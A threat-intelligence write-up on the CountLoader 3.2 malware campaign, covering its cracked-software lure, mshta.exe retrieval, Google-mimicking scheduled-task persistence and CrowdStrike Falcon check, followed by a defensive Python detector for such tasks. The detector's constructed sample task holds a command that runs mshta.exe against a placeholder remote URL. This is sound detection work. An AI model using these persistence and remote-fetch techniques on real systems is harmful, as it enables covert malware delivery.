
"The campaign 'uses CountLoader as the initial tool in a multistage attack for access, evasion, and delivery of additional malware families,' Cyderes Howler Cell Threat Intelligence team said in an analysis. CountLoader was previously documented by both Fortinet and Silent Push, detailing the loader's ability to push payloads like Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner. The loader has been detected in the wild since at least June 2025."
"The latest attack chain begins when unsuspecting users attempt to download cracked versions of legitimate software like Microsoft Word, which causes them to be redirected to a MediaFire link hosting a malicious ZIP archive, which contains an encrypted ZIP file and a Microsoft Word document with the password to open the second archive. Present within the ZIP file is a renamed legitimate Python interpreter ('Setup.exe') that has been configured to execute a malicious command to retrieve CountLoader 3.2 from a remote server using 'mshta.exe'."
"To establish persistence, the malware creates a scheduled task that mimics Google by using the name 'GoogleTaskSystem136.0.7023.12' along with an identifier-like string. It's configured to run every 30 minutes for 10 years by invoking 'mshta.exe'. It also checks if CrowdStrike's Falcon security tool is installed on the host by querying the antivirus list via Windows Management Instrumentation (WMI). If the service is detected, the persistence command is tweaked to 'cmd.exe /c start /b mshta.exe <URL>'. Otherwise, it directly reaches out to the URL using 'mshta.exe'."
CountLoader 3.2 is delivered through cracked-software download chains: the victim is redirected to a MediaFire-hosted ZIP archive that holds a password-protected inner ZIP and a Word document carrying its password. Inside the password-protected archive is a renamed legitimate Python interpreter ("Setup.exe") configured to run a command that retrieves CountLoader 3.2 from a remote server via mshta.exe. CountLoader then fetches next-stage payloads; earlier reporting ties it to Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner. For persistence it creates a scheduled task named to mimic Google ("GoogleTaskSystem136.0.7023.12" plus an identifier-like string), configured to run every 30 minutes for 10 years by invoking mshta.exe. Before registering it, the loader queries the WMI antivirus product list for CrowdStrike Falcon; if Falcon is present the persistence command is wrapped as "cmd.exe /c start /b mshta.exe <URL>", otherwise mshta.exe is pointed at the URL directly.
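The persistence pattern described above (a scheduled task that re-runs mshta.exe against a remote URL every 30 minutes for years, optionally wrapped in "cmd.exe /c start /b") can be hunted for in exported task definitions. The Python below is an added example written for this page, not code from Cyderes, Fortinet, Silent Push or The Hacker News. The two task XML bodies, the URL http://example.invalid/count.hta and the task name NightlyBackup are constructed for the example, and the name-mimicry regex is an assumed heuristic, not a published detection rule.

```python
"""Triage Windows Scheduled Task XML for CountLoader-style persistence: a task
that re-runs mshta.exe against a remote URL on a short repetition interval
for years, sometimes wrapped in "cmd.exe /c start /b".

Added example for this page; the task bodies below are constructed, not
artifacts recovered from the campaign.
"""
import re
import xml.etree.ElementTree as ET

TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
URL_RE = re.compile(r'https?://[^\s"\']+', re.I)
# Vendor-like prefix plus a Chrome-style four-part version: a weak, name-only
# signal (assumed heuristic, not a published rule), reported for context only.
MIMIC_NAME_RE = re.compile(r"^(google|chrome|microsoft|adobe)\w*\d+(\.\d+){3}$", re.I)

# Constructed: the shape of the persistence task described in the write-up, with
# the Falcon-aware "cmd.exe /c start /b" wrapper and a placeholder URL.
SAMPLE_MALICIOUS_TASK = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\GoogleTaskSystem136.0.7023.12</URI></RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT30M</Interval><Duration>P3650D</Duration></Repetition>
      <StartBoundary>2025-06-01T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>cmd.exe</Command>
      <Arguments>/c start /b mshta.exe http://example.invalid/count.hta</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign task: a daily local binary with no repetition block.
SAMPLE_BENIGN_TASK = """<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\NightlyBackup</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2025-06-01T02:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>C:\\Tools\\backup.exe</Command>
    <Arguments>--full</Arguments></Exec></Actions>
</Task>"""


def parse_iso_duration(value):
    """Seconds for a Task Scheduler ISO-8601 duration such as PT30M or P3650D.
    'M' before the 'T' separator is months (approximated as 30 days); after it, minutes."""
    m = re.fullmatch(
        r"P(?:(\d+)Y)?(?:(\d+)M)?(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?",
        value.strip())
    if not m:
        raise ValueError(f"bad duration: {value!r}")
    y, mo, d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return ((y * 365 + mo * 30 + d) * 24 + h) * 3600 + mi * 60 + s


def analyze_task(xml_text):
    """Parse one task definition (str or raw file bytes) and return the indicators found."""
    # Files under C:\Windows\System32\Tasks are UTF-16 with an encoding declaration
    # that ElementTree rejects on str input, so decode and drop the declaration first.
    if isinstance(xml_text, bytes):
        utf16 = xml_text[:2] in (b"\xff\xfe", b"\xfe\xff")
        xml_text = xml_text.decode("utf-16" if utf16 else "utf-8")
    xml_text = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text)
    root = ET.fromstring(xml_text)

    def find_text(path):
        node = root.find(path.format(ns=TASK_NS))
        return (node.text or "").strip() if node is not None else ""

    name = find_text("{ns}RegistrationInfo/{ns}URI").lstrip("\\")
    interval = find_text(".//{ns}Repetition/{ns}Interval")
    duration = find_text(".//{ns}Repetition/{ns}Duration")
    actions = []
    for ex in root.iter(TASK_NS + "Exec"):
        cmd = (ex.findtext(TASK_NS + "Command") or "").strip()
        args = (ex.findtext(TASK_NS + "Arguments") or "").strip()
        actions.append(f"{cmd} {args}".strip())

    findings, url = [], None
    for line in actions:
        low = line.lower()
        if "mshta" in low:
            hit = URL_RE.search(line)
            if hit:
                url = hit.group(0)
                findings.append("mshta_remote_url")
            else:
                findings.append("mshta_exec")
            if re.search(r"\bstart\s+/b\b", low):  # the Falcon-aware wrapper
                findings.append("cmd_start_b_wrapper")
    interval_s = parse_iso_duration(interval) if interval else None
    duration_s = parse_iso_duration(duration) if duration else None
    # Hourly-or-faster beaconing kept alive for a year or more is unusual for admin tasks.
    if interval_s and interval_s <= 3600 and duration_s and duration_s >= 365 * 86400:
        findings.append("high_frequency_long_lived")
    if MIMIC_NAME_RE.match(name):
        findings.append("vendor_mimic_name")
    return {"name": name, "actions": actions, "url": url,
            "interval_s": interval_s, "duration_s": duration_s, "findings": findings}


def is_suspicious(result):
    """Alert only on the strong indicator; the other findings are triage context."""
    return "mshta_remote_url" in result["findings"]


if __name__ == "__main__":
    for task_xml in (SAMPLE_MALICIOUS_TASK, SAMPLE_BENIGN_TASK):
        r = analyze_task(task_xml)
        print(f"{r['name']}: {r['findings'] or 'clean'} suspicious={is_suspicious(r)}")
```

Point analyze_task at the files under C:\Windows\System32\Tasks (raw UTF-16 bytes are handled) or at the task XML carried in a Security event 4698. The mshta.exe-with-URL action is the signal worth alerting on; the name check is deliberately weak, since legitimate vendor updater tasks can also carry version-style suffixes, and the repetition check only adds weight.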
Read at The Hacker News